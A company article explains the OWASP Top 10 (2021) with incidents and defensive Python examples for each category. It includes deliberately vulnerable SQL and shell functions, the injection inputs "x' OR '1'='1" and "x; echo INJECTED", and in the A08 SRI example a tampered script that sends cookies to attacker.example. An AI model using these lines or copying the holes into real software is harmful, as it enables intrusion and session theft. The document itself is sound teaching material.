OWASP Top 10-2021


OWASP, Cybersecurity, Web Application Vulnerability

August 13, 2024

What is OWASP?

The Open Web Application Security Project (OWASP; since 2023 the Open Worldwide Application Security Project) is an international non-profit organization dedicated to the security of software and web applications. OWASP has no commercial intentions and is open to anyone interested in the security of data and operations in web applications. It provides resources such as documentation, tools, videos, and forums. Its best-known project is the OWASP Top 10.

What are the OWASP Top 10?

The OWASP Top 10 is a regularly updated awareness document that describes the ten most critical security risks for web applications. Each entry is a category of weakness (with a list of related CWEs), not a single vulnerability. The list has been published by the namesake organization since 2003 and is revised roughly every three to four years. The 2021 edition is the current version.

The OWASP TOP 10 - 2021

The 2021 edition adds three new categories compared to the previous edition of 2017: Insecure Design (A04), Software and Data Integrity Failures (A08), and Server-Side Request Forgery (A10). Several other categories were renamed, merged, or redefined.

A01:2021 - Broken Access Control

Access control enforces what users, authenticated or not, are allowed to do, so that nobody can act outside their intended permissions. Flaws in access control can lead to uncontrolled disclosure of sensitive data, to modification or destruction of data, or to business functions being executed beyond the user's permission level. Typical examples are missing server-side checks on object identifiers in URLs or API parameters, and privilege escalation by tampering with a role or user ID in a request.

Real-Life Example

Inadequate access control on Steam's developer portal allowed a security researcher to retrieve the CD keys for every game on Steam. The issue was reported through Valve's HackerOne program.

A02:2021 - Cryptographic Failures

Cryptographic failures cover weak or missing cryptography: data transmitted or stored without encryption, obsolete algorithms and protocols, weak or hard-coded keys, poor key management, missing certificate validation, and passwords stored with fast hashes or no hashing at all. Such lapses directly affect the confidentiality and integrity of application data: an attacker who can read or alter data in transit or at rest obtains credentials, personal data, or payment information. In 2017 this category was called "Sensitive Data Exposure," but that name described a symptom rather than a cause; the new name points to the root cause, a failure in cryptography. The disclosure of private keys or passwords is a frequent consequence of such failures.

Real-Life Example

In February 2017, Tavis Ormandy of Google's Project Zero discovered that Cloudflare's edge servers were leaking uninitialised memory into HTTP responses. The leaked data, including session cookies, authentication tokens, and other private content of unrelated Cloudflare customers, ended up cached by search engines, where it could be read by anyone. The bug became known as Cloudbleed. Strictly speaking, its root cause was a memory-safety bug in an HTML parser rather than a cryptographic one; it appears here because its impact, sensitive data exposure, is exactly what the old name of this category described.

A03:2021 - Injection

Injection occurs when user-controlled input is passed to an interpreter (a SQL engine, an operating-system shell, an LDAP server, a template engine, or similar) as part of a command or query without being separated from the command's structure. The interpreter then treats parts of the input as syntax rather than as data; the exact effect depends on the technology involved.

For example, if a request parameter is concatenated into a SQL query, an attacker can close the string literal and append SQL of their own, allowing them to read, modify, or delete sensitive data and, on some databases, to run administrative operations. This is SQL Injection.

Another variant is OS Command Injection: input that reaches a shell command lets the attacker execute arbitrary commands on the server with the privileges of the web application, which can lead to full control of the host.

In general, an injection attack occurs when untrusted data reaches an interpreter via form fields, URL parameters, headers, cookies, or any other input channel. The primary defence is to keep data and code separate: use parameterised queries or prepared statements, pass arguments to processes without a shell, and validate input against an allowlist as a second line of defence. Since 2021 the category also includes Cross-Site Scripting (XSS), which is injection into the browser's HTML and JavaScript interpreter.
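The following is an added example, not code from the article or from OWASP. It puts the vulnerable string-building version of a SQL lookup and of a shell command next to the parameterised and argv-based versions, so the difference in behaviour can be observed directly. The user table, the inputs and the hostname allowlist are constructed for the example; echo stands in for the real command the application would run.

```python
import re
import sqlite3
import subprocess


def make_db():
    """Constructed in-memory stand-in for an application's user table (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users (username, is_admin) VALUES (?, ?)",
        [("alice", 1), ("bob", 0)],
    )
    return conn


def find_user_vulnerable(conn, username):
    # Deliberately vulnerable: the raw input is spliced into the SQL text, so a
    # quote inside `username` ends the string literal and the rest is parsed as SQL.
    query = f"SELECT username, is_admin FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, username):
    # Parameterised query: the value travels separately from the statement and
    # is never parsed as SQL, whatever characters it contains.
    return conn.execute(
        "SELECT username, is_admin FROM users WHERE username = ?", (username,)
    ).fetchall()


def run_vulnerable(name):
    # Deliberately vulnerable: shell=True hands the string to /bin/sh, so ';',
    # '|', '&&' or '$(...)' inside `name` start additional commands.
    result = subprocess.run(f"echo {name}", shell=True, capture_output=True, text=True)
    return result.stdout


def run_safe(name):
    # argv list and no shell: the argument reaches the program verbatim and
    # cannot become a second command, no matter what metacharacters it holds.
    result = subprocess.run(["echo", name], capture_output=True, text=True)
    return result.stdout


# Allowlist for the one kind of value this endpoint is meant to accept (a hostname);
# second line of defence in front of run_safe(). Assumed format for the example.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def valid_hostname(name):
    return bool(HOSTNAME_RE.match(name))
```

The tautology input "x' OR '1'='1" returns every row from the vulnerable query and nothing from the parameterised one; "x; echo INJECTED" runs two commands through the shell but is printed as a single literal argument by the argv version, and is rejected by the allowlist before it ever gets there.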

A04:2021 - Insecure Design

Insecure design refers to weaknesses that are built into the architecture of an application rather than introduced during coding: security requirements that were never gathered, threat modelling that was never done, business logic that can be abused exactly as designed. Because the application was not conceived with security in mind, these flaws affect its foundation and open the door to a wide range of vulnerabilities, up to information disclosure or total compromise.

OWASP distinguishes this category from implementation flaws: a secure design can still be undermined by implementation bugs, but an insecure design cannot be rescued by a perfect implementation, because the missing control was never specified in the first place. Typical causes are a lack of business-risk profiling, missing security requirements, and the absence of secure design patterns and reference architectures. The remedies sit correspondingly early in the lifecycle: threat modelling for critical flows, abuse cases written alongside user stories, and design reviews before code is written.

A05:2021 - Security Misconfiguration

Security misconfiguration covers security controls that are missing, left at insecure defaults, or set incorrectly at any layer of the stack. Typical causes are:

  • Poorly configured systems such as firewalls, web servers, application servers, or web applications, including missing or incorrect HTTP security headers.

  • Unnecessary features enabled or installed, such as open ports, services, sample pages, accounts, or excessive permissions.

  • Default accounts and passwords enabled or unchanged.

  • Software that is not up to date, or error handling that reveals stack traces and other internals to users.

Real-Life Example

The website of the US Department of Defense shipped a misconfigured HTTP security header: the X-XSS-Protection header was present but set to DENY, a value that belongs to X-Frame-Options and is meaningless for X-XSS-Protection, so browsers simply ignored it. The researcher therefore recommended changing the value to 1; mode=block, the syntax the header actually expects. (The header has since been deprecated and removed from current browsers; today's guidance is to set it to 0 or omit it and to rely on a Content-Security-Policy instead.) The original report is publicly available.
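As an added example (not from the article or the report it cites), here is a small checker for exactly this class of mistake: it takes the response headers of one page and reports missing headers, values pasted into the wrong header, and version leakage. The expected values, the one-year HSTS minimum and the "version" heuristic for the Server header are this example's assumptions, and the two header sets are constructed to mirror the report above and its corrected form.

```python
import re

# Assumed expectations for this example (a reviewer's baseline, not an OWASP list).
FRAME_OPTIONS = {"DENY", "SAMEORIGIN"}
XSS_PROTECTION = {"0", "1", "1; mode=block"}   # the only syntactically valid forms
HSTS_MIN_AGE = 31536000                         # one year, in seconds


def check_headers(headers):
    """Return a list of findings for one HTTP response's headers (dict, any case)."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []

    xfo = h.get("x-frame-options")
    if xfo is None:
        findings.append("X-Frame-Options missing (clickjacking)")
    elif xfo.upper() not in FRAME_OPTIONS:
        findings.append(f"X-Frame-Options has invalid value {xfo!r}")

    xss = h.get("x-xss-protection")
    if xss is not None:
        norm = re.sub(r"\s*;\s*", "; ", xss).lower()
        if norm not in XSS_PROTECTION:
            # e.g. DENY: a value from another header, ignored by the browser
            findings.append(f"X-XSS-Protection has invalid value {xss!r}; "
                            "valid forms are 0, 1 or 1; mode=block")
        elif norm != "0":
            findings.append("X-XSS-Protection enables the legacy XSS auditor; "
                            "current guidance is 0 plus a Content-Security-Policy")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options should be 'nosniff'")

    m = re.search(r"max-age=(\d+)", h.get("strict-transport-security", ""), re.I)
    if not m:
        findings.append("Strict-Transport-Security missing or without max-age")
    elif int(m.group(1)) < HSTS_MIN_AGE:
        findings.append(f"Strict-Transport-Security max-age {m.group(1)} is below one year")

    if "content-security-policy" not in h:
        findings.append("Content-Security-Policy missing")

    server = h.get("server", "")
    if re.search(r"\d", server):   # heuristic: a digit usually means a version string
        findings.append(f"Server header leaks version information: {server!r}")

    return findings


# Constructed samples: the first repeats the mistake described in the report
# (a value from X-Frame-Options pasted into X-XSS-Protection), the second is fixed.
MISCONFIGURED = {
    "Server": "Apache/2.4",
    "X-XSS-Protection": "DENY",
    "Strict-Transport-Security": "max-age=300",
}
HARDENED = {
    "Server": "Apache",
    "X-Frame-Options": "DENY",
    "X-XSS-Protection": "0",
    "X-Content-Type-Options": "nosniff",
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
}
```

Run against the misconfigured set it yields six findings, among them the invalid X-XSS-Protection value; the hardened set yields none. In practice the dictionary would come from the response object of whatever HTTP client is in use.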

A06:2021 - Vulnerable and Outdated Components

Modern web applications are assembled from frameworks and libraries: software components that save developers redundant work and provide needed functionality, from front-end frameworks such as React down to small libraries that add icons or A/B testing. Attackers look for vulnerabilities in these components because the most popular ones are used on hundreds of thousands of websites, so a single vulnerability in a widely used component makes all of those sites exploitable at once. An application is at risk when it does not know which component versions it runs (including transitive dependencies), when components are unsupported or out of date, or when no process exists to track advisories and patch promptly.

Real-Life Example

On December 9, 2021, a remote code execution (RCE) vulnerability in the Apache logging library Log4j 2, tracked as CVE-2021-44228 and nicknamed Log4Shell, was publicly disclosed. It affected versions 2.0-beta9 through 2.14.1 and could be triggered by getting a crafted JNDI lookup string into any value the application logged, for example a User-Agent header.

Log4j 2 is an open-source logging library from the Apache Software Foundation that is used in a vast number of applications and services, directly and as a transitive dependency, for development, operational, and security logging, which is why the impact was so broad.
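The first step against this category is knowing what is actually deployed. As an added example (not from the article or any OWASP tool), the following scans a Maven pom.xml for dependencies, resolves ${property} versions, and compares them against an advisory table. The only advisory entry is the real Log4Shell range (CVE-2021-44228: log4j-core from 2.0-beta9 up to but excluding 2.15.0); the pom.xml is constructed, and the version ordering is a simplified reading of Maven's rules (numeric components, with a pre-release suffix such as -beta9 sorting before the release).

```python
import re
import xml.etree.ElementTree as ET

# Real advisory data for the case discussed above; no other entries.
ADVISORIES = [
    {
        "coordinates": "org.apache.logging.log4j:log4j-core",
        "id": "CVE-2021-44228",
        "introduced": "2.0-beta9",
        "fixed": "2.15.0",
    },
]


def version_key(version):
    """Sort key for Maven-style versions: numeric parts, then a pre-release suffix
    (2.0-beta9) ordered before the corresponding release (2.0). Simplified."""
    main, _, suffix = version.partition("-")
    nums = tuple(int(p) for p in re.findall(r"\d+", main))
    nums += (0,) * (3 - len(nums))
    if suffix:
        m = re.match(r"([A-Za-z]*)(\d*)", suffix)
        return (nums, 0, m.group(1).lower(), int(m.group(2) or 0))
    return (nums, 1, "", 0)


def is_affected(version, advisory):
    v = version_key(version)
    return version_key(advisory["introduced"]) <= v < version_key(advisory["fixed"])


def parse_pom_dependencies(pom_xml):
    """Return [(groupId:artifactId, version)] from a pom.xml, resolving ${property}."""
    root = ET.fromstring(pom_xml)
    local = lambda el: el.tag.split("}")[-1]        # strip the Maven XML namespace
    props = {}
    for el in root:
        if local(el) == "properties":
            props = {local(p): (p.text or "").strip() for p in el}

    def resolve(text):
        return re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), m.group(0)), text or "")

    deps = []
    for dep in root.iter():
        if local(dep) != "dependency":
            continue
        f = {local(c): (c.text or "").strip() for c in dep}
        deps.append((f"{f.get('groupId')}:{f.get('artifactId')}", resolve(f.get("version"))))
    return deps


def scan_pom(pom_xml):
    """Return (coordinates, version, advisory id, fixed version) for each affected dependency."""
    findings = []
    for coords, version in parse_pom_dependencies(pom_xml):
        for adv in ADVISORIES:
            if adv["coordinates"] == coords and is_affected(version, adv):
                findings.append((coords, version, adv["id"], adv["fixed"]))
    return findings


# Constructed pom.xml for the example; the second dependency has no advisory here.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <log4j.version>2.14.1</log4j.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
    <dependency>
      <groupId>org.apache.commons</groupId>
      <artifactId>commons-lang3</artifactId>
      <version>3.12.0</version>
    </dependency>
  </dependencies>
</project>
"""
```

A real scan has to cover transitive dependencies too (the resolved tree from mvn dependency:tree, a lock file, or an SBOM), which is where Log4j usually hid; a pom.xml alone only shows what was declared directly.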

A07:2021 - Identification and Authentication Failures

Previously called Broken Authentication, this category covers weaknesses in login and session management: missing protection against brute-force and credential-stuffing attacks, acceptance of weak or well-known passwords, passwords stored in plaintext or with weak hashes, missing or ineffective multi-factor authentication, and session identifiers that are exposed in URLs, not rotated after login, or not invalidated on logout. The category remains a staple of the Top 10, but as standardized frameworks with built-in authentication have become more widespread it has become less prevalent, dropping from second place in 2017 to seventh in 2021.

Real-Life Example

Uber did not rate-limit the https://biz.uber.com/confirm endpoint, which allowed an attacker to brute-force access to business accounts and take rides in their name. The issue was reported through Uber's HackerOne program, where the original report is public.
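As an added example (not code from the article, OWASP, or Uber), the following login service shows the two controls the category most often finds missing: slow, salted password hashing (PBKDF2-HMAC-SHA256 from the standard library, at the iteration count OWASP's Password Storage Cheat Sheet currently recommends) and a per-account attempt counter with a temporary lockout. The clock is injectable so the lockout can be exercised without waiting; the limits and the dummy-hash trick for unknown usernames are this example's design choices.

```python
import hashlib
import hmac
import os
import time

PBKDF2_ITERATIONS = 600_000   # OWASP cheat-sheet figure for PBKDF2-HMAC-SHA256


def hash_password(password):
    """Salted PBKDF2 hash, self-describing so the parameters can be raised later."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))   # constant-time comparison


# Verified for unknown usernames so a missing account costs the same time as a
# wrong password; otherwise response time would reveal which usernames exist.
_DUMMY_HASH = hash_password(os.urandom(16).hex())


class LoginService:
    def __init__(self, max_attempts=5, lockout_seconds=900, clock=time.monotonic):
        self.max_attempts = max_attempts
        self.lockout_seconds = lockout_seconds
        self.clock = clock
        self.users = {}          # username -> stored hash
        self.failures = {}       # username -> consecutive failed attempts
        self.locked_until = {}   # username -> monotonic time the lock expires

    def register(self, username, password):
        self.users[username] = hash_password(password)

    def login(self, username, password):
        """Return (allowed, reason). The reason is for logging; the HTTP response
        to the client should be the same generic message for every failure."""
        now = self.clock()
        if self.locked_until.get(username, 0) > now:
            return False, "locked"
        ok = verify_password(password, self.users.get(username, _DUMMY_HASH))
        if username not in self.users:
            ok = False   # the dummy hash must never authenticate anyone
        if ok:
            self.failures.pop(username, None)
            return True, "ok"
        count = self.failures.get(username, 0) + 1
        self.failures[username] = count
        if count >= self.max_attempts:
            self.locked_until[username] = now + self.lockout_seconds
            self.failures.pop(username, None)
            return False, "locked"
        return False, "bad_credentials"
```

In a deployed service the counters would live in shared storage, be keyed by source address as well as by account (so a credential-stuffing run across many accounts is also caught), and be bounded so that unknown usernames cannot be used to exhaust memory. Endpoints that accept codes or tokens, like the confirmation endpoint in the Uber report, need the same throttling as the password form.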

A08:2021 - Software and Data Integrity Failures

This new category covers code and infrastructure that do not protect against integrity violations: software updates, critical data, and CI/CD pipelines whose integrity is never verified. Examples are applications that load plugins, libraries, or modules from unverified sources, repositories, or content delivery networks (CDNs); an insecure CI/CD pipeline that lets an attacker inject malicious code into a build; and auto-update mechanisms that install whatever they download without checking a signature, which lets an attacker push updates of their own. Insecure deserialisation, a category of its own in 2017, was folded into this one, since deserialising untrusted data is another way unverified input changes program behaviour. Defences are digital signatures on artefacts and updates, Subresource Integrity for resources served from CDNs, pinned and reviewed dependencies, and access-controlled, audited build pipelines.
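Subresource Integrity (SRI) is the concrete control for the CDN case: the page embeds a digest of the script it reviewed, and the browser refuses to run anything else. As an added example (not from the article or OWASP), the following computes the integrity value for a resource and verifies a fetched body against it the way the SRI specification prescribes, picking the strongest listed algorithm and accepting any matching value for it. The script bodies are constructed; the only deliberate deviation from a browser is noted in the code.

```python
import base64
import hashlib
import hmac

# Weakest to strongest; SRI permits only these three.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_digest(body, algo="sha384"):
    """Integrity value for a resource, e.g. 'sha384-<base64 of the raw digest>'."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode()}"


def verify_sri(body, integrity):
    """Check a fetched body against an integrity attribute.
    As in the spec: use the strongest algorithm present, accept if any of its values
    matches. Unlike a browser (which loads the resource when the attribute is
    unparseable), an attribute with no usable token fails here."""
    by_algo = {}
    for token in integrity.split():
        algo, _, value = token.partition("-")
        if algo in SRI_ALGORITHMS and value:
            by_algo.setdefault(algo, []).append(value.split("?")[0])   # drop options
    if not by_algo:
        return False
    strongest = max(by_algo, key=SRI_ALGORITHMS.index)
    expected = base64.b64encode(hashlib.new(strongest, body).digest())
    return any(hmac.compare_digest(expected, v.encode()) for v in by_algo[strongest])


def script_tag(src, body):
    """The tag a site emits for a third-party script it has reviewed and pinned."""
    return (f'<script src="{src}" integrity="{sri_digest(body)}" '
            f'crossorigin="anonymous"></script>')


# Constructed bodies: the reviewed build and a copy a compromised CDN might serve.
REVIEWED_SCRIPT = b"window.track = function (e) { /* reviewed build */ };\n"
TAMPERED_SCRIPT = REVIEWED_SCRIPT + b"fetch('https://attacker.example/?c=' + document.cookie);\n"
```

The same compare_digest-against-a-pinned-digest pattern applies to a release download checked against a digest published out of band; what SRI adds is that the check is enforced by the client on every load, not once at install time. Note the trade-off: pinning the digest means a CDN-side update of the library is rejected until the site reviews it and changes the tag, which is exactly the point.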

Real-Life Example

The most notable example is the SolarWinds Orion compromise of 2020: attackers gained access to SolarWinds' build environment and inserted a backdoor (SUNBURST) into Orion updates that were then signed and distributed to customers through the legitimate update channel, so the malicious build looked authentic to everyone who installed it.

A09:2021 - Security Logging and Monitoring Failures

This category ranked tenth in 2017 (as Insufficient Logging & Monitoring) and was expanded in 2021 to cover more kinds of failure. Logging and monitoring exist to detect, escalate, and respond to active breaches; without them, attackers can persist unnoticed. Typical issues: auditable events such as logins, failed logins, and high-value transactions are not logged; warnings and errors generate no or unclear log entries; logs are kept only locally, where an attacker with host access can tamper with them; logs are not monitored for suspicious activity; and alerting thresholds and escalation processes are not defined or not tested, so the application cannot detect or alert on an attack in real time. Care is also needed in the other direction: logs must not contain passwords, tokens, or session identifiers, and log injection (user input written unescaped into log lines) must be prevented.
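As an added example (not from the article or OWASP), the following is the kind of detection logic the category asks for, run over constructed authentication log lines: it raises an alert when one source address accumulates a threshold of failed logins inside a time window, flags a subsequent success from that same source as a probable compromise, and counts lines it cannot parse rather than dropping them silently. The log format, the addresses (documentation ranges) and the thresholds are assumptions for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Assumed line format: ISO timestamp, fixed "auth" tag, key=value fields.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "user": m["user"], "src": m["src"], "result": m["result"]}


def detect(lines, threshold=5, window_seconds=60):
    """Return alert tuples (kind, subject, detail) for a sequence of log lines."""
    alerts = []
    recent = defaultdict(deque)   # src -> timestamps of failures inside the window
    burst_sources = set()         # sources that already triggered a brute-force alert
    unparsed = 0
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            unparsed += 1
            continue
        q = recent[ev["src"]]
        if ev["result"] == "FAIL":
            q.append(ev["ts"])
            while q and (ev["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()   # slide the window
            if len(q) >= threshold and ev["src"] not in burst_sources:
                burst_sources.add(ev["src"])
                alerts.append(("brute_force", ev["src"], ev["ts"].isoformat()))
        elif ev["src"] in burst_sources:
            # a success right after a burst is the event worth escalating
            alerts.append(("success_after_burst", ev["src"], ev["user"]))
    if unparsed:
        # a logger that stopped producing parseable output is itself a finding
        alerts.append(("unparsed_lines", str(unparsed), ""))
    return alerts


# Constructed sample: one source cycling through several usernames (credential
# stuffing), then succeeding; a second source with one honest typo; one garbled line.
SAMPLE_LOG = """\
2024-08-13T10:00:01Z auth user=alice src=203.0.113.5 result=FAIL
2024-08-13T10:00:03Z auth user=alice src=203.0.113.5 result=FAIL
2024-08-13T10:00:04Z auth user=bob src=203.0.113.5 result=FAIL
2024-08-13T10:00:06Z auth user=carol src=203.0.113.5 result=FAIL
2024-08-13T10:00:09Z auth user=dave src=203.0.113.5 result=FAIL
2024-08-13T10:00:12Z auth user=dave src=203.0.113.5 result=OK
2024-08-13T10:00:15Z auth user=erin src=198.51.100.7 result=FAIL
2024-08-13T10:00:40Z auth user=erin src=198.51.100.7 result=OK
garbage line from a crashed logger
"""
```

Keying on the source address rather than the account is what catches credential stuffing, where each account sees only one or two failures. The alerts are data structures, not print statements, so the same function can feed a SIEM rule, a test suite, or a pager.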

A10:2021 - Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) occurs when a web application fetches a remote resource from a user-supplied URL without validating it. An attacker can then make the application send a crafted request to an unexpected destination, including internal services that are shielded by a firewall, VPN, or network access control list (ACL) and are unreachable from outside, because the request originates from the trusted server itself. OWASP notes that the severity of SSRF is growing with cloud services and complex architectures: cloud instance metadata endpoints, internal admin interfaces, and service-to-service APIs are typical targets. Defences include allowlisting destination schemes and hosts, resolving the hostname and rejecting private, loopback, and link-local addresses, not following redirects blindly, and segmenting the network so the application server cannot reach what it does not need.
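As an added example (not from the article or OWASP), the following validator implements those defences for a URL the server is about to fetch: it restricts scheme and port, rejects embedded credentials, resolves the host and refuses any address that is not globally routable (which covers loopback, RFC 1918 ranges, and the 169.254.169.254 cloud metadata address), and unwraps IPv4-mapped IPv6 literals so ::ffff:127.0.0.1 is judged as 127.0.0.1. The resolver is injectable; the one used in the test is a constructed table, and the allowed port set is an assumption of the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}      # assumed policy for this example


def default_resolver(host):
    """All addresses for a hostname (IPv4 and IPv6), via the system resolver."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_public_address(addr):
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return ip.is_global and not ip.is_multicast


def validate_outbound_url(url, resolver=default_resolver):
    """Return (scheme, host, port, ip) for a URL the server may fetch, else raise ValueError.
    The caller must connect to the returned ip rather than resolving again, and must
    not follow redirects without re-validating each hop; otherwise DNS rebinding or a
    redirect chain turns the validated request into an internal one."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # IP literal: nothing to resolve
    except ValueError:
        addrs = resolver(host)                      # hostname (also catches 2130706433-style forms)
    if not addrs:
        raise ValueError(f"host does not resolve: {host!r}")
    for addr in addrs:
        if not is_public_address(addr):
            raise ValueError(f"{host} resolves to non-public address {addr}")
    return scheme, host, port, addrs[0]


def is_allowed(url, resolver=default_resolver):
    try:
        validate_outbound_url(url, resolver)
        return True
    except ValueError:
        return False


# Constructed resolver table standing in for DNS; the "rebind" entry mixes a public
# and a private answer, which must be rejected as a whole.
FAKE_DNS = {
    "api.example.com": ["8.8.8.8"],
    "metadata.example.com": ["169.254.169.254"],
    "rebind.example.com": ["8.8.8.8", "10.0.0.5"],
}


def fake_resolver(host):
    return FAKE_DNS.get(host, [])
```

Resolving once and connecting to the returned address closes the rebinding window only if the HTTP client honours it; with most clients that means pinning the IP in the connection and sending the original hostname in the Host header and TLS SNI. Where the set of legitimate destinations is known in advance, an explicit hostname allowlist in front of this check is simpler and stronger than address filtering alone.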


© 2024 Schönbrunn TASC GmbH
Schönbrunn TASC GmbH
Riedwiesenstraße 1, 71229 Leonberg